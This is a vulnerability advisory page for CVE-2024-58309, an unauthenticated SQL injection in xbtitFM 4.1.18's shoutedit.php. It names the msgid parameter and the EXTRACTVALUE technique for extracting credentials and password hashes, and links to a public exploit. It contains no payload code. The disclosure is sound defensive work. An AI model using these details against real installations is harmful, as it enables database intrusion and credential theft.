xbtitFM 4.1.18 Unauthenticated SQL Injection in shoutedit.php
CVE-2024-58309

8.7HIGH

Key Information:

Vendor

Xbtitfm

Status
Xbtitfm
Vendor
CVE Published:
11 December 2025

Badges

๐Ÿ‘พ Exploit Exists

What is CVE-2024-58309?

xbtitFM 4.1.18 contains an unauthenticated SQL injection vulnerability that allows remote attackers to manipulate database queries by injecting malicious SQL code through the msgid parameter. Attackers can send crafted requests to /shoutedit.php with EXTRACTVALUE functions to extract database names, user credentials, and password hashes from the underlying database.

Affected Version(s)

xbtitFM 4.1.18

References

https://www.exploit-db.com/exploits/51909
exploit
https://xbtitfm.eu
product
https://www.vulncheck.com/advisories/xbtitfm-unauthentica...
third-party-advisory

CVSS V4

Score:
8.7
Severity:
HIGH
Confidentiality:
High
Integrity:
High
Availability:
High
Attack Vector:
Network
Attack Complexity:
Low
Attack Required:
None
Privileges Required:
Undefined
User Interaction:
None

Timeline

  • ๐ŸŸก

    Public PoC available

  • ๐Ÿ‘พ

    Exploit known to exist

  • Vulnerability published

  • Vulnerability Reserved

Credit

xbtitFM Team
JSON
.
CVE-2024-58309 : Unauthenticated SQL Injection in xbtitFM Software by xbtitFM